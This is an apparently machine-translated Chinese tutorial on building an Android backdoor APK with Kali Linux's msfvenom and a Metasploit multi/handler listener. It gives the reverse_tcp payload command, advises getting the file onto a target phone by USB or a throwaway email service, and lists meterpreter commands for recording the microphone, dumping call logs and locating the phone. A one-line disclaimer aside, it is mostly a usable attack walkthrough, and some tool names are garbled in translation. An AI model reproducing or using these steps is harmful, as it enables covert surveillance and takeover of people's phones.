Android 智能手机通常是大多数商业物联网设备的网关。 Nest 烟雾报警器通过相关的 Android 应用程序进行管理。用于控制温度的 Nest Thermostat 也是如此。智能锁、门铃摄像头——几乎所有智能设备都可以从 Alexa 或其他主应用程序访问。如果有人远程访问这样的 Android 手机怎么办?你认为这是不可能的吗?为此,我们将提供一个基本演示,说明如何使用 Kali Linux“metasploit”创建 Android 手机的后门入口。
笔记:本教程适用于安全研究人员和爱好者。我们不建议未经许可侵入任何人的手机。
背景
在开始使用 Kali Linux 之前,您首先需要熟悉其控制台终端。
它很容易托管一个全面的工具列表,这些工具旨在针对设备的固件或操作系统。
在这里,我们将使用一种常见的工具,称为“无国界医生毒液”在 Android 手机中插入病毒。它根据用户选择的选项生成多种有效负载。该漏洞适用于许多平台,包括 Windows、Android、OpenBSD、Solaris、JAVA、PHP 和游戏硬件。
启动 Android Metasploit
以下步骤将演示如何在 Kali Linux 系统上下载 MSFVenom。
启动终端并输入以下命令。
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk在这里,有效负载是使用名为“Meterpreter”的漏洞利用扩展启动的。

要确定侦听器主机的 IP 地址,请打开一个新的控制台终端并输入ifconfig。通常,端口 4444 分配给木马、漏洞利用程序和病毒。

确定 IP 地址后,返回上一屏幕并输入详细信息。
文件“hackand.apk”将保存在桌面上,是Android手机上使用的主要后门漏洞。

下一步,启动“msfconsole”,这是与 Kali Linux 一起使用的常见渗透测试工具。为此,请输入service postgresql start其次是msfconsole。 PostgreSQL 是指存储控制台的数据库。

一旦渗透工具准备就绪,您就可以启动剩余的漏洞利用程序。

接下来,将使用一个名为“multi-handler”的可执行文件。
use multi/handler请参阅下图将漏洞与控制台连接起来。将使用相同的 IP 地址和端口号。

在下一阶段,msfvenom 漏洞将通过一个简单的启动和初始化exploit命令。现在,我们必须找到一个目标,那就是 Android 手机。

我们之前下载的 hackand.apk 文件大小只有 10 KB。您必须找到一种方法将文件插入目标手机中。您可以使用 USB 或临时电子邮件服务传输病毒。
一般来说,Gmail 或 Yahoo 等网络邮件提供商会拒绝携带受此病毒感染的文件。
Android 会在您插入软件之前向您发出警告。但是,只需不到 20 秒即可完成安装,因为您只需“忽略风险并安装”。如果您的手机处于解锁模式,这会使威胁变得更加严重。

如图所示,可以对手机造成很多损坏,包括修改存储内容、阻止手机睡眠、连接和断开 Wi-Fi、设置壁纸等。

一旦安装了APK文件,它就可以巧妙地伪装在手机内。

现在,您可以在 Kali Linux 终端上使用如下许多命令来控制手机。您不必真正记住它们,因为该列表可以通过简单的方式获得help选项中meterpreter.
record_mic:录制麦克风dump calllog:获取通话记录webcam_chat:开始视频聊天geolocate:获取手机当前位置
大多数先进的 Android 手机都会阻止安装此恶意应用程序。因此,此漏洞通常适用于较旧的 Android 型号。
另请阅读: 7 个最佳 Android 黑客应用程序
想法
在本教程中,我们了解了使用 Kali Linux 访问 Android 智能手机的基本策略。尽管这是一个非常简单的漏洞,但它对物联网安全具有重大影响。
您对 Kali Linux 漏洞有何看法?您会对手机的安全更加谨慎吗?请在评论中告诉我们。






